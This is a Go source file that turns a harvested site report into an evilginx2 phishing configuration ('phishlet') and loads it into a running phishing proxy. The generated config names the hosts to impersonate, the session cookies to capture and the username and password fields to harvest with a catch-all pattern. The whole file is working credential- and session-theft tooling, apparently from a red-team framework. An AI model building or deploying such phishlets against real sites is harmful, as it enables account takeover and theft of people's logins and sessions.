// Package phishletgen converts a site-auditor report (emitted by
// tools/phishlet_harvester.py) into an evilinx2 phishlet YAML file and
// registers it with a running configuration, without requiring a restart.
package phishletgen

import (
	"fmt"
	"os"
	"path/filepath"
	"regexp"
	"strconv"
	"strings"

	"github.com/kgretzky/evilginx2/core"
)

// Report is the JSON contract produced by tools/phishlet_harvester.py.
type Report struct {
	Site         string        `json:"site"`
	Domain       string        `json:"domain"`
	LoginURL     string        `json:"login_url"`
	LoginDomain  string        `json:"login_domain"`
	LoginPath    string        `json:"login_path"`
	ProxyHosts   []ProxyHost   `json:"proxy_hosts"`
	AuthTokens   []AuthToken   `json:"auth_tokens"`
	Credentials  Credentials   `json:"credentials"`
	Notes        []string      `json:"notes"`
}

// ProxyHost mirrors one proxy_hosts entry of an evilinx phishlet.
type ProxyHost struct {
	OrigSub   string `json:"orig_sub"`
	Domain    string `json:"domain"`
	Session   bool   `json:"session"`
	IsLanding bool   `json:"is_landing"`
}

// AuthToken mirrors one auth_tokens entry.
type AuthToken struct {
	Domain string   `json:"domain"`
	Keys   []string `json:"keys"`
}

// Field is the username/password field definition.
type Field struct {
	Key string `json:"key"`
}

// Credentials holds the credential field names.
type Credentials struct {
	Username Field `json:"username"`
	Password Field `json:"password"`
}

// Text-only YAML scalar quoting: safe as-is when the value matches the
// plain-scalar pattern, otherwise double-quoted Go style.
func yamlQuote(s string) string {
	if s == "" {
		return "''"
	}
	if safeYAML.MatchString(s) {
		return "'" + s + "'"
	}
	return strconv.Quote(s)
}

var safeYAML = regexp.MustCompile(`^[A-Za-z0-9._@/\- ]+$`)

var siteNameRe = regexp.MustCompile(`^[a-zA-Z0-9._-]{1,64}$`)

// ValidateSiteName reports whether s is usable as a phishlet name (must match
// the filename rules the engine scan uses: [a-zA-Z0-9._-]).
func ValidateSiteName(s string) bool {
	return siteNameRe.MatchString(s)
}

// Render produces the YAML text of an evilinx version 2.3.0 phishlet from a
// report. It performs the same structural checks the engine's parser enforces
// so that a successful result is loadable by core.NewPhishlet.
func Render(r Report) (string, error) {
	r.Site = strings.TrimSpace(r.Site)
	r.LoginDomain = strings.TrimSpace(strings.ToLower(r.LoginDomain))
	r.LoginPath = strings.TrimSpace(r.LoginPath)

	if r.Site == "" {
		return "", fmt.Errorf("report missing site name")
	}
	if !ValidateSiteName(r.Site) {
		return "", fmt.Errorf("invalid site name %q", r.Site)
	}
	if r.LoginDomain == "" {
		return "", fmt.Errorf("report missing login_domain")
	}
	if len(r.ProxyHosts) == 0 {
		return "", fmt.Errorf("report missing proxy_hosts")
	}
	if r.LoginPath == "" {
		r.LoginPath = "/"
	}
	if !strings.HasPrefix(r.LoginPath, "/") {
		r.LoginPath = "/" + r.LoginPath
	}
	userKey := strings.TrimSpace(r.Credentials.Username.Key)
	if userKey == "" {
		userKey = "username"
	}
	passKey := strings.TrimSpace(r.Credentials.Password.Key)
	if passKey == "" {
		passKey = "password"
	}

	var b strings.Builder
	b.WriteString("author: 'generated by evilgophish phishletgen'\n")
	b.WriteString("min_ver: '2.3.0'\n")
	b.WriteString("proxy_hosts:\n")
	sawLanding := false
	sawSession := false
	for _, ph := range r.ProxyHosts {
		orig := strings.ToLower(ph.OrigSub)
		dom := strings.ToLower(ph.Domain)
		if strings.TrimSpace(dom) == "" {
			return "", fmt.Errorf("proxy host missing domain")
		}
		if orig == dom {
			orig = "" // apex host
		}
		b.WriteString("  - {phish_sub: ")
		b.WriteString(yamlQuote(orig))
		b.WriteString(", orig_sub: ")
		b.WriteString(yamlQuote(orig))
		b.WriteString(", domain: ")
		b.WriteString(yamlQuote(dom))
		if ph.IsLanding {
			b.WriteString(", is_landing: true")
			sawLanding = true
		}
		if ph.Session {
			b.WriteString(", session: true")
			sawSession = true
		}
		b.WriteString("}\n")
	}
	if !sawLanding {
		b.WriteString(`  # note: no is_landing host flagged - engine falls back to the first` + "\n")
	}
	if !sawSession {
		b.WriteString(`  # note: no session host flagged - engine falls back to the first` + "\n")
	}
	b.WriteString("sub_filters: []\n")
	b.WriteString("auth_tokens:\n")
	if len(r.AuthTokens) == 0 {
		b.WriteString("  - domain: ")
		b.WriteString(yamlQuote("." + strings.TrimPrefix(r.LoginDomain, ".")))
		b.WriteString("\n    keys: []\n")
	} else {
		for _, at := range r.AuthTokens {
			dom := strings.ToLower(strings.TrimSpace(at.Domain))
			if dom == "" {
				continue
			}
			if !strings.HasPrefix(dom, ".") {
				dom = "." + dom
			}
			b.WriteString("  - domain: ")
			b.WriteString(yamlQuote(dom))
			b.WriteString("\n    keys: [")
			for i, k := range at.Keys {
				if i > 0 {
					b.WriteString(", ")
				}
				b.WriteString(yamlQuote(k))
			}
			b.WriteString("]\n")
		}
	}
	b.WriteString("credentials:\n")
	b.WriteString("  username:\n")
	b.WriteString("    key: ")
	b.WriteString(yamlQuote(userKey))
	b.WriteString("\n    search: '(.*)'\n    type: 'post'\n")
	b.WriteString("  password:\n")
	b.WriteString("    key: ")
	b.WriteString(yamlQuote(passKey))
	b.WriteString("\n    search: '(.*)'\n    type: 'post'\n")
	b.WriteString("login:\n")
	b.WriteString("  domain: ")
	b.WriteString(yamlQuote(r.LoginDomain))
	b.WriteString("\n  path: ")
	b.WriteString(yamlQuote(r.LoginPath))
	b.WriteString("\n")
	return b.String(), nil
}

// WritePhishlet writes the YAML content into dir/<site>.yaml, verifies it
// parses with the engine, and registers it with cfg so the phishlet becomes
// available immediately (and automatically again after a restart, when the
// engine rescans the directory). On parse failure the file is removed again.
func WritePhishlet(cfg *core.Config, dir, site string, content []byte) (*core.Phishlet, error) {
	if !ValidateSiteName(site) {
		return nil, fmt.Errorf("invalid phishlet name %q", site)
	}
	if _, err := cfg.GetPhishlet(site); err == nil {
		return nil, fmt.Errorf("phishlet %q already exists", site)
	}
	if len(strings.TrimSpace(string(content))) == 0 {
		return nil, fmt.Errorf("empty phishlet content")
	}

	path := filepath.Join(dir, site+".yaml")
	if err := os.MkdirAll(dir, 0o700); err != nil {
		return nil, err
	}
	if err := os.WriteFile(path, []byte(content), 0o600); err != nil {
		return nil, err
	}

	pl, err := core.NewPhishlet(site, path, nil, cfg)
	if err != nil {
		os.Remove(path)
		return nil, fmt.Errorf("generated phishlet failed validation: %v", err)
	}
	cfg.AddPhishlet(site, pl)
	return pl, nil
}